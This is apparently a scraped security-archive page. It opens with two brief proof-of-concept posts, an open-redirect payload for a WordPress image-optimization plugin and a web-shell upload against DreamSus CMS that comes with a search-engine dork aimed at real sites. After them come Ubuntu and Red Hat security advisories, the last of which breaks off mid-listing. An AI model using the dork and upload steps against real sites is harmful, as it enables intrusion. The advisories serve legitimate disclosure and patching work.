WordPress Image Optimization plugin version 3.8.2 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : WordPress Image Optimization 3.8.2 Open Redirect Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://wordpress.org/plugins/optimole-wp/                                                                         |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpg[+] https://mlsxkssu4flj.i.optimolecom/nyJIGCw._y-W~3254a/w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpgGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Image Optimization 3.8.2 Open Redirection

CMS Ultimate Solutions DreamSus version 1.4 suffers from a remote shell upload vulnerability.

**CMS Ultimate Solutions DreamSus 1.4 Shell Upload**

Posted Jul 24, 2023

Authored by indoushka

CMS Ultimate Solutions DreamSus version 1.4 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | 687fc9626b0a4c7e675cd7007c558b29ceea1784dee6326f9ae2ef2465dc6ffe

Download | Favorite | View

**CMS Ultimate Solutions DreamSus 1.4 Shell Upload**

    ====================================================================================================================================| # Title     : CMS Ultimate Solutions DreamSus v1.4 unrestricted file upload Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://dreamsus.com                                                                                                |  | # Dork      : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] http://127.0.0.1/spcollegejejurieduin/add_testimonial.php <==== Fill in the blanks and choose your malicious file and upload[+] http://127.0.0.1/spcollegejejurieduin/uploads/testimonial/Ev!l.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,739)
*   Arbitrary (16,155)
*   BBS (2,859)
*   Bypass (1,735)
*   CGI (1,025)
*   Code Execution (7,238)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,364)
*   Encryption (2,365)
*   Exploit (51,634)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (891)
*   Java (3,036)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,666)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,637)
*   Security Tool (7,876)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,307)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,711)
*   Web (9,622)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,866)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,994)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,794)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,241)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,599)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,269)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Ultimate Solutions DreamSus 1.4 Shell Upload

Ubuntu Security Notice 6232-1 - It was discovered that wkhtmltopdf was not properly enforcing the same-origin policy when processing certain HTML files. If a user or automated system using wkhtmltopdf were tricked into processing a specially crafted HTML file, an attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6232-1  
July 20, 2023

wkhtmltopdf vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

wkhtmltopdf could be made to expose sensitive information if it opened a  
specially crafted file.

Software Description:  
- wkhtmltopdf: Command line utility to convert html to pdf using WebKit

Details:

It was discovered that wkhtmltopdf was not properly enforcing the  
same-origin policy when processing certain HTML files. If a user or  
automated system using wkhtmltopdf were tricked into processing a  
specially crafted HTML file, an attacker could possibly use this issue to  
expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
wkhtmltopdf 0.12.5-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.12.4-1ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.12.2.4-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.9.9-4ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6232-1  
CVE-2020-21365

Package Information:  
https://launchpad.net/ubuntu/+source/wkhtmltopdf/0.12.5-1ubuntu0.1

Ubuntu Security Notice USN-6232-1

Red Hat Security Advisory 2023-4241-01 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift Data Foundation 4.10.14 security and bug fix update  
Advisory ID:       RHSA-2023:4241-01  
Product:           Red Hat OpenShift Data Foundation  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4241  
Issue date:        2023-07-20  
CVE Names:         CVE-2020-24736 CVE-2023-1667 CVE-2023-2283   
                   CVE-2023-3089 CVE-2023-24329 CVE-2023-26604   
=====================================================================

1. Summary:

Updated images that fix several bugs are now available for Red Hat  
OpenShift Data Foundation 4.10.14 on Red Hat Enterprise Linux 8 from Red  
Hat Container Registry.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Data Foundation is software-defined storage integrated  
with and optimized for the Red Hat OpenShift Data Foundation. Red Hat  
OpenShift Data Foundation is a highly scalable, production-grade persistent  
storage for stateful applications running in the Red Hat OpenShift  
Container Platform. In addition to persistent storage, Red Hat OpenShift  
Data Foundation provisions a multi-cloud data management service with an  
S3-compatible API.

Security Fix(es):

* openshift: OCP & FIPS mode (CVE-2023-3089)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Set ​​maxOpenShiftVersion to block OpenShift that didn't upgrade ODF  
version (BZ#2213450)

* [odf 4.10.z] resolve the CVP failure for  
operators.openshift.io/valid-subscription annotation in the CSV  
(BZ#2222863)

All users of Red Hat OpenShift Data Foundation are advised to upgrade to  
these updated images, which provide these bug fixes.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2211595 - [ODF 4.10] [GSS] unknown parameter name "FORCE_OSD_REMOVAL"  
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode  
2213450 - Set ??maxOpenShiftVersion to block OpenShift that didn't upgrade ODF version  
2222863 - [odf 4.10.z] resolve the CVP failure for operators.openshift.io/valid-subscription annotation in the CSV  
2224269 - [Major Incident] CVE-2023-3089 mcg-operator-container: openshift: OCP & FIPS mode [openshift-data-foundation-4.10]

5. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuoZmAAoJENzjgjWX9erE9nMP/15wYBGhFXcl8eOBMAQK+BAp  
kE9Ad4Qz9j2pgbSnx1Tr6TXi7lllOj+TP61HY6YNN9Gre6x3EyZ3bMWM7u5bUZK5  
f000XnXfJ+N3Wye1oRXepzFslDQ7c9jHyhZVCMwMvI9meP8I98Lhr3ezEBrY+8VY  
KahH8N3Bd7PsqQ8CjYutxM13hacOrTBWE213nVMJ7MPtuMAaka+KcE5nSFcUtG5N  
RI3OWnoey8RuZ/4E3Yuobl2ayukyMwCwVN85vmAlJEKJDbaT8yqvrJ3nT9Arquep  
KIvQFzceljCWnmwLZ3jwMwLMBK9XJD/yq9504cpoUDrT6WGcGpqw1WdLf42uuvd6  
gga9hC2qpPEBjs0FzG59SiEYjagG9rmjah+gLc1c2FqNZhY1t7PDBWLoo5JyAd5C  
B3/Lt+dMw+W/Atts5VlwLMsFusKq9gJGYnbK4RrjEqca+hS2TnwcjckVHAUZeQRt  
E87b8qXrGvE3FeN67eaYUkbJLoPzVdhdThhR4ebSIjb7bhngq5uJlTfsZiWIyqjV  
cviiUYzwcv4vvg5MY2B09xDieHciF2HjHC7stLOrBrhRU6z+UOM1GqdDlC/pTdk6  
veEm2rRVDrzyQnYw4yte9f8/UI+g6GATF8rd67VJbIChShYYeEzIFfUsx7J1hXn3  
/8mvGXNOJVC2aEFyBI0h  
=dERc  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4241-01

Red Hat Security Advisory 2023-4159-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:4159-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4159  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22044 CVE-2023-22045 CVE-2023-22049   
                   CVE-2023-25193   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: modulo operator array indexing issue (8304460) (CVE-2023-22044)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Installing the same java-17-openjdk-headless package on two different  
systems resulted in distinct classes.jsa files getting generated. This was  
because the CDS archive was being generated by a post script action of the  
java-17-openjdk-headless package. This prevented the use of the dynamic  
dump feature, as the checksum in the archive would be different on each  
system. This is resolved in this release by using the .jsa files generated  
during the initial build. (RHBZ#2221655)

* Prepare for the next quarterly OpenJDK upstream release (2023-07, 17.0.8)  
[rhel-8] (BZ#2222368)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: allows attackers to trigger O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221642 - CVE-2023-22044 OpenJDK: modulo operator array indexing issue (8304460)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2221655 - Base JDK CDS archive (classes.jsa) not unique per JDK build [rhel-8,openjdk-17] [rhel-8.8.0.z]  
2222368 - Prepare for the next quarterly OpenJDK upstream release (2023-07, 17.0.8) [rhel-8] [rhel-8.8.0.z]  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-17-openjdk-17.0.8.0.7-2.el8.src.rpm

aarch64:  
java-17-openjdk-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-demo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-devel-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-headless-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-javadoc-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-jmods-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-src-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-static-libs-17.0.8.0.7-2.el8.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-demo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-devel-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-headless-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-jmods-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-src-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.8.0.7-2.el8.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-demo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-devel-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-headless-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-javadoc-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-jmods-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-src-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-static-libs-17.0.8.0.7-2.el8.s390x.rpm

x86_64:  
java-17-openjdk-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-demo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-devel-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-headless-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-javadoc-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-jmods-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-src-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-static-libs-17.0.8.0.7-2.el8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-devel-fastdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.8.0.7-2.el8.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.8.0.7-2.el8.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.8.0.7-2.el8.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.8.0.7-2.el8.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-slowdebug-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.8.0.7-2.el8.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.8.0.7-2.el8.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.8.0.7-2.el8.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.8.0.7-2.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22044  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIbBAEBCAAGBQJkuYZ/AAoJENzjgjWX9erEQkQP9jBNk1G2SQ2ZNNhJ98crFJAj  
qYULgNPo0CkILsSzFOm9jpQ6PutcZlhEal6c7lPsM2o6k0JJ8M4aEaNNwAz2fOqI  
1oSMOP9mUaJrisT+lg0V+UYhiNZ5/dP4if4177I7inRIujpBR0WNhxgtdwnNTLIW  
lRwPRGaCLkSIuDR8xXZvU4vjj2tm6TYln2hq/RB0q1Xws+kkDeSX71WzPFY7krA3  
sISb1GlsjwtoNbC12A/E5/vATNHYx4EjV6H2nB0SjRMNyhKpQzW5O07A2THtjxJ+  
dotZIVxnXy5gbO8QdbKEggRsExa7LY+9r49n8MZ0aXeM9Am462LDNixUfNeNkApU  
9lb9HtHwX+9xxXWdeFQGt7YW0/XkLHz+duCbvvj3/oJTiW0cIx/BR60uHi7qmGL1  
V2VlOUpdj9MM+eiwQTNW5i1mjEyeF+ACNXk92Zd+Fpno4bpEQ8Lxt1vN0XI4vAXU  
IkWysnWKsOFwAh6vJQD9XOdKsLjWLqrV9oozmLYdbv5ZPt2YxX4vshqQ7jLSqwK2  
qveHq8+ZetqvgbMiyjCe7qXr7etIBkbCE7m6Rj4S/RoYBvTXtHhVN+tSoY4EInWM  
U1oyPPeqYQs6R/ZGlAsPzajPkDp+jDjEDdi+QdRb82W+U9aVFWYKi0xV0ddiWmfy  
4ho4Q++gt2kkfVYd6oI=  
=c4kF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4159-01

Red Hat Security Advisory 2023-4178-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:4178-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4178  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22045 CVE-2023-22049   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, ppc64le, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

